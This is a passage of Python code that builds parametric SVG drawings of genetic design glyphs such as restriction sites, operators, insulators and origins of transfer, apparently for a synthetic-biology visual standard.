question_path['parametric:d'] = 'M{baseline_x+pad_before+(width*0.35)},{(baseline_y-baseline_offset)-(width*0.06)} C{baseline_x+pad_before+(width*0.35)},{(baseline_y-baseline_offset)-(width*0.23)} {baseline_x+pad_before+width-(width*0.25)},{(baseline_y-baseline_offset)-(width*0.23)} {baseline_x+pad_before+width-(width*0.35)},{(baseline_y-baseline_offset)+(width*0.01)} C{baseline_x+pad_before+width-(width*0.35)},{(baseline_y-baseline_offset)+(width*0.05)} {baseline_x+pad_before+(width*0.5)},{(baseline_y-baseline_offset)+(width*0.01)} {baseline_x+pad_before+(width*0.5)},{(baseline_y-baseline_offset)+(width*0.15)}'
question_path['d'] = eval_parameterised_path(question_path['parametric:d'], params)
question_path['style'] = style_text['unfilled-path']
glyph_paths.append(question_path)
point_path = {}
point_path['class'] = 'unfilled-path'
point_path['id'] = 'unspecified-question-mark-point'
point_path['parametric:d'] = 'M{baseline_x+pad_before+(width*0.5)},{(baseline_y-baseline_offset)+(width*0.27)} L{baseline_x+pad_before+(width*0.5)},{(baseline_y-baseline_offset)+(width*0.27)}'
point_path['d'] = eval_parameterised_path(point_path['parametric:d'], params)
point_path['style'] = style_text['unfilled-path']
glyph_paths.append(point_path)
return header_text, glyph_paths
def omitted_detail_svg (baseline_x=baseline_x, baseline_y=baseline_y):
params = {}
# General parameters
params['baseline_x'] = baseline_x
params['baseline_y'] = baseline_y
params['baseline_offset'] = 0
params['pad_before'] = 2
params['pad_after'] = 2
params['pad_top'] = 3
params['pad_bottom'] = 3
# Unspecified component parameters
params['width'] = 15
# Make the header text (SVG, bounding box, and baseline elements)
header_text = svg_header('Omitted Detail', '', parametric_defaults=params, width=svg_width, height=svg_height)
header_text += bounding_box('{baseline_x}', '{(baseline_y-baseline_offset)-pad_top}', '{pad_before+width+pad_after}', '{pad_top+pad_bottom}', params, style=style_text['bounding-box'])
header_text += baseline('{baseline_x}', '{baseline_y}', '{pad_before+width+pad_after}', params, style=style_text['baseline'])
# Hold the individual paths for the glyph
glyph_paths = []
# Generate the paths for the glyph and add to list of paths
bg_path = {}
bg_path['class'] = 'filled-background-path'
bg_path['id'] = 'omitted-detail-background'
bg_path['parametric:d'] = 'M{baseline_x+pad_before},{(baseline_y-baseline_offset)-(pad_top*0.5)} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)-(pad_top*0.5)} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)+(pad_top*0.5)} L{baseline_x+pad_before},{(baseline_y-baseline_offset)+(pad_bottom*0.5)} Z}'
bg_path['d'] = eval_parameterised_path(bg_path['parametric:d'], params)
bg_path['style'] = style_text['filled-background-path']
glyph_paths.append(bg_path)
point1_path = {}
point1_path['class'] = 'unfilled-path'
point1_path['id'] = 'omitted-detail-point1'
point1_path['parametric:d'] = 'M{baseline_x+pad_before+(width*0.5)},{(baseline_y-baseline_offset)} L{baseline_x+pad_before+(width*0.5)},{(baseline_y-baseline_offset)}'
point1_path['d'] = eval_parameterised_path(point1_path['parametric:d'], params)
point1_path['style'] = style_text['unfilled-path']
glyph_paths.append(point1_path)
point2_path = {}
point2_path['class'] = 'unfilled-path'
point2_path['id'] = 'omitted-detail-point1'
point2_path['parametric:d'] = 'M{baseline_x+pad_before+(width*0.25)},{(baseline_y-baseline_offset)} L{baseline_x+pad_before+(width*0.25)},{(baseline_y-baseline_offset)}'
point2_path['d'] = eval_parameterised_path(point2_path['parametric:d'], params)
point2_path['style'] = style_text['unfilled-path']
glyph_paths.append(point2_path)
point3_path = {}
point3_path['class'] = 'unfilled-path'
point3_path['id'] = 'omitted-detail-point1'
point3_path['parametric:d'] = 'M{baseline_x+pad_before+(width*0.75)},{(baseline_y-baseline_offset)} L{baseline_x+pad_before+(width*0.75)},{(baseline_y-baseline_offset)}'
point3_path['d'] = eval_parameterised_path(point3_path['parametric:d'], params)
point3_path['style'] = style_text['unfilled-path']
glyph_paths.append(point3_path)
return header_text, glyph_paths
def recombination_site_svg (baseline_x=baseline_x, baseline_y=baseline_y):
params = {}
# General parameters
params['baseline_x'] = baseline_x
params['baseline_y'] = baseline_y
params['baseline_offset'] = 0
params['pad_before'] = 2
params['pad_after'] = 2
params['pad_top'] = 3
params['pad_bottom'] = 3
# Unspecified component parameters
params['width'] = 10
params['height'] = 15
# Make the header text (SVG, bounding box, and baseline elements)
header_text = svg_header('Recombination Site', '', parametric_defaults=params, width=svg_width, height=svg_height)
header_text += bounding_box('{baseline_x}', '{(baseline_y-baseline_offset)-(height*0.5)-pad_top}', '{pad_before+width+pad_after}', '{pad_top+height+pad_bottom}', params, style=style_text['bounding-box'])
header_text += baseline('{baseline_x}', '{baseline_y}', '{pad_before+width+pad_after}', params, style=style_text['baseline'])
# Hold the individual paths for the glyph
glyph_paths = []
# Generate the paths for the glyph and add to list of paths
recombination_site_path = {}
recombination_site_path['class'] = 'filled-path'
recombination_site_path['id'] = 'recombination-site'
recombination_site_path['parametric:d'] = 'M{baseline_x+pad_before},{(baseline_y-baseline_offset)-(height*0.5)} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)} {baseline_x+pad_before},{(baseline_y-baseline_offset)+(height*0.5)} Z'
recombination_site_path['d'] = eval_parameterised_path(recombination_site_path['parametric:d'], params)
recombination_site_path['style'] = style_text['filled-path']
glyph_paths.append(recombination_site_path)
return header_text, glyph_paths
def no_glyph_svg (baseline_x=baseline_x, baseline_y=baseline_y):
params = {}
# General parameters
params['baseline_x'] = baseline_x
params['baseline_y'] = baseline_y
params['baseline_offset'] = 0
params['pad_before'] = 2
params['pad_after'] = 2
params['pad_top'] = 3
params['pad_bottom'] = 3
# Unspecified component parameters
params['width'] = 8
params['height'] = 15
# Make the header text (SVG, bounding box, and baseline elements)
header_text = svg_header('No Glyph', '', parametric_defaults=params, width=svg_width, height=svg_height)
header_text += bounding_box('{baseline_x}', '{(baseline_y-baseline_offset)-(height*0.5)-pad_top}', '{pad_before+width+pad_after}', '{pad_top+height+pad_bottom}', params, style=style_text['bounding-box'])
header_text += baseline('{baseline_x}', '{baseline_y}', '{pad_before+width+pad_after}', params, style=style_text['baseline'])
# Hold the individual paths for the glyph
glyph_paths = []
# Generate the paths for the glyph and add to list of paths
bg_path = {}
bg_path['class'] = 'filled-background-path'
bg_path['id'] = 'operator-background'
bg_path['parametric:d'] = 'M{baseline_x+pad_before},{(baseline_y-baseline_offset)-(height*0.5)} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)-pad_top-(height*0.5)} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)+(height*0.5)} L{baseline_x+pad_before},{(baseline_y-baseline_offset)+(height*0.5)} Z}'
bg_path['d'] = eval_parameterised_path(bg_path['parametric:d'], params)
bg_path['style'] = style_text['filled-background-path']
glyph_paths.append(bg_path)
no_glyph_path1 = {}
no_glyph_path1['class'] = 'unfilled-path'
no_glyph_path1['id'] = 'no-glyph-path1'
no_glyph_path1['parametric:d'] = 'M{baseline_x+pad_before+(width*0.3)},{(baseline_y-baseline_offset)-(height*0.5)} L{baseline_x+pad_before},{(baseline_y-baseline_offset)-(height*0.5)} L{baseline_x+pad_before},{(baseline_y-baseline_offset)+(height*0.5)} L{baseline_x+pad_before+(width*0.3)},{(baseline_y-baseline_offset)+(height*0.5)}'
no_glyph_path1['d'] = eval_parameterised_path(no_glyph_path1['parametric:d'], params)
no_glyph_path1['style'] = style_text['unfilled-path']
glyph_paths.append(no_glyph_path1)
no_glyph_path2 = {}
no_glyph_path2['class'] = 'unfilled-path'
no_glyph_path2['id'] = 'no-glyph-path1'
no_glyph_path2['parametric:d'] = 'M{baseline_x+pad_before+(width*0.7)},{(baseline_y-baseline_offset)-(height*0.5)} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)-(height*0.5)} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)+(height*0.5)} L{baseline_x+pad_before+(width*0.7)},{(baseline_y-baseline_offset)+(height*0.5)}'
no_glyph_path2['d'] = eval_parameterised_path(no_glyph_path2['parametric:d'], params)
no_glyph_path2['style'] = style_text['unfilled-path']
glyph_paths.append(no_glyph_path2)
return header_text, glyph_paths
def operator_svg (baseline_x=baseline_x, baseline_y=baseline_y):
params = {}
# General parameters
params['baseline_x'] = baseline_x
params['baseline_y'] = baseline_y
params['baseline_offset'] = 0
params['pad_before'] = 2
params['pad_after'] = 2
params['pad_top'] = 3
params['pad_bottom'] = 3
# Unspecified component parameters
params['width'] = 7
params['height'] = 7
# Make the header text (SVG, bounding box, and baseline elements)
header_text = svg_header('Operator', 'SO:0000057,SO:0000409', parametric_defaults=params, width=svg_width, height=svg_height)
header_text += bounding_box('{baseline_x}', '{(baseline_y-baseline_offset)-(height*0.5)-pad_top}', '{pad_before+width+pad_after}', '{pad_top+height+pad_bottom}', params, style=style_text['bounding-box'])
header_text += baseline('{baseline_x}', '{baseline_y}', '{pad_before+width+pad_after}', params, style=style_text['baseline'])
# Hold the individual paths for the glyph
glyph_paths = []
# Generate the paths for the glyph and add to list of paths
bg_path = {}
bg_path['class'] = 'filled-background-path'
bg_path['id'] = 'operator-background'
bg_path['parametric:d'] = 'M{baseline_x+pad_before},{(baseline_y-baseline_offset)-(height*0.5)} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)-pad_top-(height*0.5)} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)+(height*0.5)} L{baseline_x+pad_before},{(baseline_y-baseline_offset)+(height*0.5)} Z}'
bg_path['d'] = eval_parameterised_path(bg_path['parametric:d'], params)
bg_path['style'] = style_text['filled-background-path']
glyph_paths.append(bg_path)
operator_path = {}
operator_path['class'] = 'unfilled-path'
operator_path['id'] = 'operator-path'
operator_path['parametric:d'] = 'M{baseline_x+pad_before},{(baseline_y-baseline_offset)-(height*0.5)} L{baseline_x+pad_before},{(baseline_y-baseline_offset)+(height*0.5)} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)+(height*0.5)} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)-(height*0.5)}'
operator_path['d'] = eval_parameterised_path(operator_path['parametric:d'], params)
operator_path['style'] = style_text['unfilled-path']
glyph_paths.append(operator_path)
return header_text, glyph_paths
def assembly_scar_svg (baseline_x=baseline_x, baseline_y=baseline_y):
params = {}
# General parameters
params['baseline_x'] = baseline_x
params['baseline_y'] = baseline_y
params['baseline_offset'] = 0
params['pad_before'] = 2
params['pad_after'] = 2
params['pad_top'] = 3
params['pad_bottom'] = 3
# Unspecified component parameters
params['width'] = 15
params['height'] = 5
# Make the header text (SVG, bounding box, and baseline elements)
header_text = svg_header('Assembly Scar', 'SO:0001953', parametric_defaults=params, width=svg_width, height=svg_height)
header_text += bounding_box('{baseline_x}', '{(baseline_y-baseline_offset)-(height*0.5)-pad_top}', '{pad_before+width+pad_after}', '{pad_top+height+pad_bottom}', params, style=style_text['bounding-box'])
header_text += baseline('{baseline_x}', '{baseline_y}', '{pad_before+width+pad_after}', params, style=style_text['baseline'])
# Hold the individual paths for the glyph
glyph_paths = []
# Generate the paths for the glyph and add to list of paths
bg_path = {}
bg_path['class'] = 'filled-background-path'
bg_path['id'] = 'assembly-scar-background'
bg_path['parametric:d'] = 'M{baseline_x+pad_before},{(baseline_y-baseline_offset)-(height*0.5)} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)-pad_top-(height*0.5)} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)+(height*0.5)} L{baseline_x+pad_before},{(baseline_y-baseline_offset)+(height*0.5)} Z}'
bg_path['d'] = eval_parameterised_path(bg_path['parametric:d'], params)
bg_path['style'] = style_text['filled-background-path']
glyph_paths.append(bg_path)
assembly_scar_path1 = {}
assembly_scar_path1['class'] = 'unfilled-path'
assembly_scar_path1['id'] = 'assembly-scar-path1'
assembly_scar_path1['parametric:d'] = 'M{baseline_x+pad_before},{(baseline_y-baseline_offset)-(height*0.5)} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)-(height*0.5)}'
assembly_scar_path1['d'] = eval_parameterised_path(assembly_scar_path1['parametric:d'], params)
assembly_scar_path1['style'] = style_text['unfilled-path']
glyph_paths.append(assembly_scar_path1)
assembly_scar_path2 = {}
assembly_scar_path2['class'] = 'unfilled-path'
assembly_scar_path2['id'] = 'assembly-scar-path1'
assembly_scar_path2['parametric:d'] = 'M{baseline_x+pad_before},{(baseline_y-baseline_offset)+(height*0.5)} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)+(height*0.5)}'
assembly_scar_path2['d'] = eval_parameterised_path(assembly_scar_path2['parametric:d'], params)
assembly_scar_path2['style'] = style_text['unfilled-path']
glyph_paths.append(assembly_scar_path2)
return header_text, glyph_paths
def blunt_restriction_site_svg (baseline_x=baseline_x, baseline_y=baseline_y):
params = {}
# General parameters
params['baseline_x'] = baseline_x
params['baseline_y'] = baseline_y
params['baseline_offset'] = 0
params['pad_before'] = 2
params['pad_after'] = 2
params['pad_top'] = 3
params['pad_bottom'] = 3
# Unspecified component parameters
params['width'] = 8
params['height'] = 15
# Make the header text (SVG, bounding box, and baseline elements)
header_text = svg_header('Blunt Restriction Site', 'SO:0001691', parametric_defaults=params, width=svg_width, height=svg_height)
header_text += bounding_box('{baseline_x}', '{(baseline_y-baseline_offset)-(height*0.5)-pad_top}', '{pad_before+width+pad_after}', '{pad_top+height+pad_bottom}', params, style=style_text['bounding-box'])
header_text += baseline('{baseline_x}', '{baseline_y}', '{pad_before+width+pad_after}', params, style=style_text['baseline'])
# Hold the individual paths for the glyph
glyph_paths = []
# Generate the paths for the glyph and add to list of paths
bg_path = {}
bg_path['class'] = 'filled-background-path'
bg_path['id'] = 'blunt-restriction-site-background'
bg_path['parametric:d'] = 'M{baseline_x+pad_before+(width*0.3)},{(baseline_y-baseline_offset)-(height*0.5)} L{baseline_x+pad_before+(width*0.7)},{(baseline_y-baseline_offset)-pad_top-(height*0.5)} L{baseline_x+pad_before+(width*0.7)},{(baseline_y-baseline_offset)+(height*0.5)} L{baseline_x+pad_before+(width*0.3)},{(baseline_y-baseline_offset)+(height*0.5)} Z}'
bg_path['d'] = eval_parameterised_path(bg_path['parametric:d'], params)
bg_path['style'] = style_text['filled-background-path']
glyph_paths.append(bg_path)
blunt_restriction_site_path1 = {}
blunt_restriction_site_path1['class'] = 'unfilled-path'
blunt_restriction_site_path1['id'] = 'blunt-restriction-site-path1'
blunt_restriction_site_path1['parametric:d'] = 'M{baseline_x+pad_before},{(baseline_y-baseline_offset)-(height*0.5)} L{baseline_x+pad_before+(width*0.3)},{(baseline_y-baseline_offset)-(height*0.5)} L{baseline_x+pad_before+(width*0.3)},{(baseline_y-baseline_offset)+(height*0.5)} L{baseline_x+pad_before},{(baseline_y-baseline_offset)+(height*0.5)}'
blunt_restriction_site_path1['d'] = eval_parameterised_path(blunt_restriction_site_path1['parametric:d'], params)
blunt_restriction_site_path1['style'] = style_text['unfilled-path']
glyph_paths.append(blunt_restriction_site_path1)
blunt_restriction_site_path2 = {}
blunt_restriction_site_path2['class'] = 'unfilled-path'
blunt_restriction_site_path2['id'] = 'blunt-restriction-site-path1'
blunt_restriction_site_path2['parametric:d'] = 'M{baseline_x+pad_before+width},{(baseline_y-baseline_offset)-(height*0.5)} L{baseline_x+pad_before+(width*0.7)},{(baseline_y-baseline_offset)-(height*0.5)} L{baseline_x+pad_before+(width*0.7)},{(baseline_y-baseline_offset)+(height*0.5)} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)+(height*0.5)}'
blunt_restriction_site_path2['d'] = eval_parameterised_path(blunt_restriction_site_path2['parametric:d'], params)
blunt_restriction_site_path2['style'] = style_text['unfilled-path']
glyph_paths.append(blunt_restriction_site_path2)
return header_text, glyph_paths
def engineered_region_svg (baseline_x=baseline_x, baseline_y=baseline_y):
params = {}
# General parameters
params['baseline_x'] = baseline_x
params['baseline_y'] = baseline_y
params['baseline_offset'] = 0
params['pad_before'] = 2
params['pad_after'] = 2
params['pad_top'] = 3
params['pad_bottom'] = 3
# Unspecified component parameters
params['width'] = 30
params['height'] = 15
# Make the header text (SVG, bounding box, and baseline elements)
header_text = svg_header('Engineered Region', 'SO:0000804', parametric_defaults=params, width=svg_width, height=svg_height)
header_text += bounding_box('{baseline_x}', '{(baseline_y-baseline_offset)-(height*0.5)-pad_top}', '{pad_before+width+pad_after}', '{pad_top+height+pad_bottom}', params, style=style_text['bounding-box'])
header_text += baseline('{baseline_x}', '{baseline_y}', '{pad_before+width+pad_after}', params, style=style_text['baseline'])
# Hold the individual paths for the glyph
glyph_paths = []
# Generate the paths for the glyph and add to list of paths
engineered_region_path = {}
engineered_region_path['class'] = 'filled-path'
engineered_region_path['id'] = 'engineered-region-path'
engineered_region_path['parametric:d'] = 'M{baseline_x+pad_before},{(baseline_y-baseline_offset)-(height*0.5)} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)-(height*0.5)} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)+(height*0.5)} {baseline_x+pad_before},{(baseline_y-baseline_offset)+(height*0.5)} Z'
engineered_region_path['d'] = eval_parameterised_path(engineered_region_path['parametric:d'], params)
engineered_region_path['style'] = style_text['filled-path']
glyph_paths.append(engineered_region_path)
return header_text, glyph_paths
def insulator_svg (baseline_x=baseline_x, baseline_y=baseline_y):
params = {}
# General parameters
params['baseline_x'] = baseline_x
params['baseline_y'] = baseline_y
params['baseline_offset'] = 0
params['pad_before'] = 2
params['pad_after'] = 2
params['pad_top'] = 3
params['pad_bottom'] = 3
# Unspecified component parameters
params['width'] = 15
# Make the header text (SVG, bounding box, and baseline elements)
header_text = svg_header('Insulator', 'SO:0000627', parametric_defaults=params, width=svg_width, height=svg_height)
header_text += bounding_box('{baseline_x}', '{(baseline_y-baseline_offset)-(width*0.5)-pad_top}', '{pad_before+width+pad_after}', '{pad_top+width+pad_bottom}', params, style=style_text['bounding-box'])
header_text += baseline('{baseline_x}', '{baseline_y}', '{pad_before+width+pad_after}', params, style=style_text['baseline'])
# Hold the individual paths for the glyph
glyph_paths = []
# Generate the paths for the glyph and add to list of paths
bg_path = {}
bg_path['class'] = 'filled-background-path'
bg_path['id'] = 'insulator-background'
bg_path['parametric:d'] = 'M{baseline_x+pad_before},{(baseline_y-baseline_offset)-(width*0.5)} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)-(width*0.5)} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)+(width*0.5)} L{baseline_x+pad_before},{(baseline_y-baseline_offset)+(width*0.5)} Z}'
bg_path['d'] = eval_parameterised_path(bg_path['parametric:d'], params)
bg_path['style'] = style_text['filled-background-path']
glyph_paths.append(bg_path)
insulator_outer_path = {}
insulator_outer_path['class'] = 'unfilled-path'
insulator_outer_path['id'] = 'insulator-outer-path'
insulator_outer_path['parametric:d'] = 'M{baseline_x+pad_before},{(baseline_y-baseline_offset)-(width*0.5)} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)-(width*0.5)} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)+(width*0.5)} L{baseline_x+pad_before},{(baseline_y-baseline_offset)+(width*0.5)} Z'
insulator_outer_path['d'] = eval_parameterised_path(insulator_outer_path['parametric:d'], params)
insulator_outer_path['style'] = style_text['unfilled-path']
glyph_paths.append(insulator_outer_path)
insulator_inner_path = {}
insulator_inner_path['class'] = 'filled-path'
insulator_inner_path['id'] = 'insulator-inner-path'
insulator_inner_path['parametric:d'] = 'M{baseline_x+pad_before+(width*0.2)},{(baseline_y-baseline_offset)-(width*0.3)} L{baseline_x+pad_before+width-(width*0.2)},{(baseline_y-baseline_offset)-(width*0.3)} L{baseline_x+pad_before+width-(width*0.2)},{(baseline_y-baseline_offset)+(width*0.3)} L{baseline_x+pad_before+(width*0.2)},{(baseline_y-baseline_offset)+(width*0.3)} Z'
insulator_inner_path['d'] = eval_parameterised_path(insulator_inner_path['parametric:d'], params)
insulator_inner_path['style'] = style_text['filled-path']
glyph_paths.append(insulator_inner_path)
return header_text, glyph_paths
def origin_of_transfer_svg (baseline_x=baseline_x, baseline_y=baseline_y):
params = {}
# General parameters
params['baseline_x'] = baseline_x
params['baseline_y'] = baseline_y
params['baseline_offset'] = 0
params['pad_before'] = 2
params['pad_after'] = 2
params['pad_top'] = 3
params['pad_bottom'] = 3
# Promoter specific parameters
params['width'] = 20
# Make the header text (SVG, bounding box, and baseline elements)
header_text = svg_header('OriginOfTransfer', 'SO:0000724', parametric_defaults=params, width=svg_width, height=svg_height)
header_text += bounding_box('{baseline_x}', '{(baseline_y-baseline_offset)-(width/2.0)-pad_top}', '{pad_before+width+pad_after}', '{pad_top+width+pad_bottom}', params, style=style_text['bounding-box'])
header_text += baseline('{baseline_x}', '{baseline_y}', '{pad_before+width+pad_after}', params, style=style_text['baseline'])
# Hold the individual paths for the glyph
glyph_paths = []
# Generate the paths for the glyph and add to list of paths
ort_path = {}
ort_path['class'] = 'filled-path'
ort_path['id'] = 'origin-of-transfer'
ort_path['parametric:d'] = 'M{baseline_x+pad_before},{(baseline_y-baseline_offset)} C{baseline_x+pad_before},{(baseline_y-baseline_offset)-(width/1.5)} {baseline_x+pad_before+width},{(baseline_y-baseline_offset)-(width/1.5)} {baseline_x+pad_before+width},{(baseline_y-baseline_offset)} C{baseline_x+pad_before+width},{(baseline_y-baseline_offset)+(width/1.5)} {baseline_x+pad_before},{(baseline_y-baseline_offset)+(width/1.5)} {baseline_x+pad_before},{(baseline_y-baseline_offset)} Z'
ort_path['d'] = eval_parameterised_path(ort_path['parametric:d'], params)
ort_path['style'] = style_text['filled-path']
glyph_paths.append(ort_path)
ort_arrowbody_path = {}
ort_arrowbody_path['class'] = 'unfilled-path'
ort_arrowbody_path['id'] = 'origin-of-transfer-arrowbody'
ort_arrowbody_path['parametric:d'] = 'M{baseline_x+pad_before+(width*0.5)},{(baseline_y-baseline_offset)} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)-(width*0.5)}'
ort_arrowbody_path['d'] = eval_parameterised_path(ort_arrowbody_path['parametric:d'], params)
ort_arrowbody_path['style'] = style_text['unfilled-path']
glyph_paths.append(ort_arrowbody_path)
ort_arrowhead_path = {}
ort_arrowhead_path['class'] = 'unfilled-path'
ort_arrowhead_path['id'] = 'origin-of-transfer-arrowhead'
ort_arrowhead_path['parametric:d'] = 'M{baseline_x+pad_before+(width*0.85)},{(baseline_y-baseline_offset)-(width*0.5)} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)-(width*0.5)} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)-(width*0.35)}'
ort_arrowhead_path['d'] = eval_parameterised_path(ort_arrowhead_path['parametric:d'], params)
ort_arrowhead_path['style'] = style_text['unfilled-path']
glyph_paths.append(ort_arrowhead_path)
return header_text, glyph_paths
def sticky_restriction_site_5_svg (baseline_x=baseline_x, baseline_y=baseline_y):
params = {}
# General parameters
params['baseline_x'] = baseline_x
params['baseline_y'] = baseline_y
params['baseline_offset'] = 0
params['pad_before'] = 2
params['pad_after'] = 2
params['pad_top'] = 3
params['pad_bottom'] = 3
# Unspecified component parameters
params['width'] = 15
params['height'] = 8
# Make the header text (SVG, bounding box, and baseline elements)
header_text = svg_header('5\' Sticky Restriction Site', 'SO:0001975', parametric_defaults=params, width=svg_width, height=svg_height)
header_text += bounding_box('{baseline_x}', '{(baseline_y-baseline_offset)-(height*0.5)-pad_top}', '{pad_before+width+pad_after}', '{pad_top+height+pad_bottom}', params, style=style_text['bounding-box'])
header_text += baseline('{baseline_x}', '{baseline_y}', '{pad_before+width+pad_after}', params, style=style_text['baseline'])
# Hold the individual paths for the glyph
glyph_paths = []
# Generate the paths for the glyph and add to list of paths
bg_path = {}
bg_path['class'] = 'filled-background-path'
bg_path['id'] = 'sticky-restriction-site-background'
bg_path['parametric:d'] = 'M{baseline_x+pad_before},{(baseline_y-baseline_offset)-(height*0.5)} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)-pad_top-(height*0.5)} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)+(height*0.5)} L{baseline_x+pad_before},{(baseline_y-baseline_offset)+(height*0.5)} Z}'
bg_path['d'] = eval_parameterised_path(bg_path['parametric:d'], params)
bg_path['style'] = style_text['filled-background-path']
glyph_paths.append(bg_path)
sticky_restriction_site_path = {}
sticky_restriction_site_path['class'] = 'unfilled-path'
sticky_restriction_site_path['id'] = 'sticky-restriction-site-path'
sticky_restriction_site_path['parametric:d'] = 'M{baseline_x+pad_before+(width*0.15)},{(baseline_y-baseline_offset)-(height*0.5)} L{baseline_x+pad_before+(width*0.15)},{(baseline_y-baseline_offset)} L{baseline_x+pad_before+(width*0.85)},{(baseline_y-baseline_offset)} L{baseline_x+pad_before+(width*0.85)},{(baseline_y-baseline_offset)+(height*0.5)}'
sticky_restriction_site_path['d'] = eval_parameterised_path(sticky_restriction_site_path['parametric:d'], params)
sticky_restriction_site_path['style'] = style_text['unfilled-path']
glyph_paths.append(sticky_restriction_site_path)
return header_text, glyph_paths
def sticky_restriction_site_3_svg (baseline_x=baseline_x, baseline_y=baseline_y):
params = {}
# General parameters
params['baseline_x'] = baseline_x
params['baseline_y'] = baseline_y
params['baseline_offset'] = 0
params['pad_before'] = 2
params['pad_after'] = 2
params['pad_top'] = 3
params['pad_bottom'] = 3
# Unspecified component parameters
params['width'] = 15
params['height'] = 8
# Make the header text (SVG, bounding box, and baseline elements)
header_text = svg_header('3\' Sticky Restriction Site', 'SO:0001976', parametric_defaults=params, width=svg_width, height=svg_height)
header_text += bounding_box('{baseline_x}', '{(baseline_y-baseline_offset)-(height*0.5)-pad_top}', '{pad_before+width+pad_after}', '{pad_top+height+pad_bottom}', params, style=style_text['bounding-box'])
header_text += baseline('{baseline_x}', '{baseline_y}', '{pad_before+width+pad_after}', params, style=style_text['baseline'])
# Hold the individual paths for the glyph
glyph_paths = []
# Generate the paths for the glyph and add to list of paths
bg_path = {}
bg_path['class'] = 'filled-background-path'
bg_path['id'] = 'sticky-restriction-site-background'
bg_path['parametric:d'] = 'M{baseline_x+pad_before},{(baseline_y-baseline_offset)-(height*0.5)} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)-pad_top-(height*0.5)} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)+(height*0.5)} L{baseline_x+pad_before},{(baseline_y-baseline_offset)+(height*0.5)} Z}'
bg_path['d'] = eval_parameterised_path(bg_path['parametric:d'], params)
bg_path['style'] = style_text['filled-background-path']
glyph_paths.append(bg_path)
sticky_restriction_site_path = {}
sticky_restriction_site_path['class'] = 'unfilled-path'
sticky_restriction_site_path['id'] = 'sticky-restriction-site-path'
sticky_restriction_site_path['parametric:d'] = 'M{baseline_x+pad_before+(width*0.15)},{(baseline_y-baseline_offset)+(height*0.5)} L{baseline_x+pad_before+(width*0.15)},{(baseline_y-baseline_offset)} L{baseline_x+pad_before+(width*0.85)},{(baseline_y-baseline_offset)} L{baseline_x+pad_before+(width*0.85)},{(baseline_y-baseline_offset)-(height*0.5)}'
sticky_restriction_site_path['d'] = eval_parameterised_path(sticky_restriction_site_path['parametric:d'], params)
sticky_restriction_site_path['style'] = style_text['unfilled-path']
glyph_paths.append(sticky_restriction_site_path)
return header_text, glyph_paths
def overhang_site_5_svg (baseline_x=baseline_x, baseline_y=baseline_y):
params = {}
# General parameters
params['baseline_x'] = baseline_x
params['baseline_y'] = baseline_y
params['baseline_offset'] = 0
params['pad_before'] = 2
params['pad_after'] = 2
params['pad_top'] = 3
params['pad_bottom'] = 3
# Unspecified component parameters
params['width'] = 15
params['height'] = 5
# Make the header text (SVG, bounding box, and baseline elements)
header_text = svg_header('5\' Overhang Site', 'SO:0001932', parametric_defaults=params, width=svg_width, height=svg_height)
header_text += bounding_box('{baseline_x}', '{(baseline_y-baseline_offset)-(height*0.5)-pad_top}', '{pad_before+width+pad_after}', '{pad_top+height+pad_bottom}', params, style=style_text['bounding-box'])
header_text += baseline('{baseline_x}', '{baseline_y}', '{pad_before+width+pad_after}', params, style=style_text['baseline'])
# Hold the individual paths for the glyph
glyph_paths = []
# Generate the paths for the glyph and add to list of paths
bg_path = {}
bg_path['class'] = 'filled-background-path'
bg_path['id'] = 'overhang_site-background'
bg_path['parametric:d'] = 'M{baseline_x+pad_before},{(baseline_y-baseline_offset)-(height*0.5)} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)-pad_top-(height*0.5)} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)+(height*0.5)} L{baseline_x+pad_before},{(baseline_y-baseline_offset)+(height*0.5)} Z}'
bg_path['d'] = eval_parameterised_path(bg_path['parametric:d'], params)
bg_path['style'] = style_text['filled-background-path']
glyph_paths.append(bg_path)
overhang_scar_path1 = {}
overhang_scar_path1['class'] = 'unfilled-path'
overhang_scar_path1['id'] = 'overhang_site-path1'
overhang_scar_path1['parametric:d'] = 'M{baseline_x+pad_before},{(baseline_y-baseline_offset)-(height*0.5)} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)-(height*0.5)}'
overhang_scar_path1['d'] = eval_parameterised_path(overhang_scar_path1['parametric:d'], params)
overhang_scar_path1['style'] = style_text['unfilled-path']
glyph_paths.append(overhang_scar_path1)
overhang_scar_path2 = {}
overhang_scar_path2['class'] = 'unfilled-path'
overhang_scar_path2['id'] = 'overhang_site-path1'
overhang_scar_path2['parametric:d'] = 'M{baseline_x+pad_before+(width*0.4)},{(baseline_y-baseline_offset)+(height*0.5)} L{baseline_x+pad_before+width},{(baseline_y-baseline_offset)+(height*0.5)}'
overhang_scar_path2['d'] = eval_parameterised_path(overhang_scar_path2['parametric:d'], params)
overhang_scar_path2['style'] = style_text['unfilled-path']
glyph_paths.append(overhang_scar_path2)
return header_text, glyph_paths
def overhang_site_3_svg (baseline_x=baseline_x, baseline_y=baseline_y):
